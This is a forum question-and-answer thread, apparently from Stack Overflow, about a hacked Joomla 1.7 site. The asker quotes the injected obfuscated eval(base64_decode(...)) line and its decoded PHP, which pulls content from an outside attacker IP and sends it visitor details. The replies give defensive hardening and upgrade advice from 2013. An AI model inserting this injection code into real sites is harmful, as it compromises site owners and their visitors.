4

I'm running a Joomla 1.7 site which was hacked today. Below script did the hack.

eval((base64_decode("DQoNCnByaW50IEBmaWxlX2dldF9jb250ZW50cygnaHR0cDovLzkzLjExNS44Ni4xNjgvaGxpbmtzL2xpbmtzLnBocD91YT0nIC4gQHVybGVuY29kZSgkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10pIC4gJyZyZXE9JyAuIEB1cmxlbmNvZGUoJF9TRVJWRVJbJ0hUVFBfSE9TVCddIC4gJy8nIC4gJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10pKTsNCg0K")));

Above line was injected to my index.php file of the templates folder. Every template which was in the folder had the above code. In each file it was repeated few times.

When I decode the code, it outputs

print @file_get_contents('http://93.115.86.168/hlinks/links.php?ua=' . @urlencode($_SERVER['HTTP_USER_AGENT']) . '&req=' . @urlencode($_SERVER['HTTP_HOST'] . '/' . $_SERVER['REQUEST_URI']));

I removed the script and site happens to work fine. Script didn't do anything bad except site did not load at all.

My problem is even when I have set the file permission to 644 and folder permission to 755, How could this happen?

How can I figure out what caused the problem? What steps should I take to prevent happening this in the future?

UPDATE

This Forum Post Assistant / FPA is very helpful

Community
  • 1
  • 1
Techie
  • 44,706
  • 42
  • 157
  • 243
  • How can I figure out which one is it? – Techie Feb 20 '13 at 10:44
  • IMHO, being hacked by other user of your hosting service is the least likely cause. Vulnerabilities in your software or getting your PC infected by a virus are more common causes. – Álvaro González Feb 20 '13 at 10:46
  • 1
    @Dasun most Joomla sites are hacked via vulnerable third party extensions. Check what extensions you have installed, look each of them up to see if there are known vulnerabilities in the versions you have. – MrCode Feb 20 '13 at 19:14

3 Answers3

2

It is not reading a file from your file system, but rather reading directly from an external URL. You can disable reading from any external URL in php via the php.ini setting:

allow_url_fopen = 0
sg-
  • 2,196
  • 1
  • 15
  • 16
  • this will disable the twitter and facebook plugins too. I have a like button and a follow button. So this is not an option. – Techie Feb 20 '13 at 10:49
  • 1
    It wont disable those as with Twitter and Facebook buttons the request to the external URL is made directly by the user themselves - not your server. This is how the Twitter and Facebook buttons know who is clicking them. – sg- Feb 20 '13 at 11:13
  • 1
    It will stop Joomla's One-Click-Update working though! – George Wilson Feb 20 '13 at 11:19
1

How about because your running a Joomla 1.7 site? Joomla 1.7 is no longer supported and several security fixes have been added into Joomla since it was released. You should immediately upgrade to 2.5.9. There should be no backwards compatability issues as 2.5.9 is just the Long Term Supported Release of Joomla 1.7.

Check your PHP settings are as advised in the Joomla Security Checklist here. Make sure you PHP and MYSQL versions are reasonably up to date (at least PHP 5.3.x - preferably 5.4.x and MYSQL at least 5.0.4).

Finally make sure all your extensions are up to date. Again developers constantly update modules not just to add new features but also to add in extra/improved security or to protect against found vulnerabilities!

Also please not turning on allow_url_fopen like Steven says will result in Joomla's One-Click-Update to stop working properly.

George Wilson
  • 5,595
  • 5
  • 29
  • 42
  • allow_url_fopen = 0 will disable the twitter and facebook plugins too. I have a like button and a follow button. So this is not an option. – Techie Feb 20 '13 at 11:01
  • Is there an upgrade path from 1.7 to 2.x? – Rimian Feb 20 '13 at 11:02
  • 1
    Yes there is. You just go into the Joomla Update Manager. There is a full docs page explanation here as well: http://docs.joomla.org/Upgrading_from_Joomla_1.7_to_Joomla_2.5 – George Wilson Feb 20 '13 at 11:07
1

It's not possible from what you've told us to pinpoint the cause of the hack, but the most likely reason (almost certain) is that you're running old versions of some software, which have known security holes that the hacker was able to attack.

  • Check your version of PHP: If it's anything lower than v5.3.21 or v5.4.11 (ie the current versions) you probably have security holes. If it's v5.2 or lower then it is definitely vulnerable (5.2 hasn't been supported for two years now). If your hosting provider is not up-to-date with their PHP version, then you need to hassle them to fix it. If they won't fix it, you need to find a better host.

  • Check your version of joomla: is it up-to-date? You mention it's v1.7: This is not up to date 1.7 was released a year and half ago. Current versions are 2.5 and 3.0. That means you almost certainly have security holes in it, which means you can be hacked. Upgrading from 1.7 to 2.5 may be painful, but if you want to be secure, you must do it.

Keeping your software up to date is one of the most important things you can do on a website to keep it secure. It's not optional: If you want to avoid being hacked, you need to keep up to date, and you need to be keeping an eye on new releases constantly -- new security holes are found all the time. Generally most good quality software is fixed fairly quickly when a new bug comes to light, but it's your responsibility to install the fixed version on your server, otherwise the bug will still be there and will likely be hacked.

There are other ways you could have been hacked; lets not discount them; most of them are outside your control. Keeping your software versions updated is your number one best defense.

SDC
  • 14,192
  • 2
  • 35
  • 48